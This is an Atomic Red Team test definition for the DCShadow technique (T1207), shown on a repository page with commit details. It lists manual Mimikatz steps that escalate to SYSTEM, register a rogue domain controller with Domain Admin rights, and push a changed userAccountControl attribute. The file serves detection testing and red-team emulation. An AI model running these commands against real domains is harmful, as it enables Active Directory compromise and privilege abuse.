Files
atomic-red-team/atomics/T1207/T1207.yaml
T
Brian Beyer 1deb39ba9a Validate command, input_arguments, and TODOs (#383)
* validate input args in command and vice versa

* validate the existence of TODOs

* Update T1002.yaml

* Update T1014.yaml

* Update T1022.yaml

* Fixed Issues Identified

Fixed multiple issues identified by branch in order to push merge
2018-10-22 13:10:51 -04:00

23 lines
781 B
YAML

---
attack_technique: T1207
display_name: DCShadow
atomic_tests:
- name: DCShadow - Mimikatz
description: |
Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
[DCShadow](https://www.dcshadow.com/)
[Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
4. lsadump::dcshadow /push